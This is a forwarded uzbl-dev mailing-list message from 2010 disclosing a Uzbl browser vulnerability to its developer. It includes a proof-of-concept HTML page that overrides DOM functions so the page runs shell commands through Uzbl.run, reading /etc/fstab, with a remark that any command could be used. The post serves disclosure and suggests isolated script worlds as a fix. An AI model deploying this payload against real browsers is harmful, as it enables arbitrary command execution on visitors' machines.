[uzbl-dev] Fw: Uzbl: security issue

[Dieter Plaetinck]

Begin forwarded message:

Date: Sat, 2 Jan 2010 14:17:43 +0100
From: Simon Lipp <sloonz at gmail.com>
To: Dieter Plaetinck <dieter at plaetinck.be>
Subject: Uzbl: security issue


Hello,

If you remember, I encountered some problem in porting my Firefox
link-follower script to Uzbl. I eventually found the issue : the local
site used for my tests was including the Prototype Javascript library.
You can reproduce the problem by opening this page in Uzbl:

<html>
<head>
<script src="prototype.js"></script>
</head>
<body>
<p>Try <code>:js for(var i in []) alert(i);</code></p>
</body>
</html>

(prototype.js can be downloaded here:
http://cdn.last.fm/javascript/release-lastfm/146804/lib/prototype.js)

I started to replace all {for(... in ...)} by {for(...;...;...)} in my
script, when I realized that it’s a security issue. Just try to open
the following page in Uzbl :

<html>
<head>
<script>
var oldwael = window.addEventListener;
var olddce = document.createElement;
window.addEventListener = function(a,b,c) {
    if(Uzbl)
        alert(Uzbl.run("print @(cat /etc/fstab)@"));
    return oldwael(a,b,c);
}
document.createElement = function(a) {
    if(Uzbl)
        alert(Uzbl.run("print @(cat /etc/fstab)@"));
    return olddce(a);
}
</script>
<body>
<p style="width:200%">If you didn't saw your fstab during the page
load, try to press fl or fL to start a link follower.</p> </body>
</html>

(you can replace "cat /etc/fstab" by any command, of course)

Concerning this issue, Chromium execute scripts in «isolated worlds» :
http://code.google.com/chrome/extensions/content_scripts.html. In the
source code, it seems to be implemented in
chrome/renderer/user_script_slave.cc, by using WebKit function
executeScriptInIsolatedWorld. However, this function is not available in
the WebCore included in webkit-gtk 1.1.15, neither in 1.1.17 (although
it’s referenced in the ChangeLog !). 

Note: I didn’t post to the list, but you can follow this mail to the
list if you wish.

--
Simon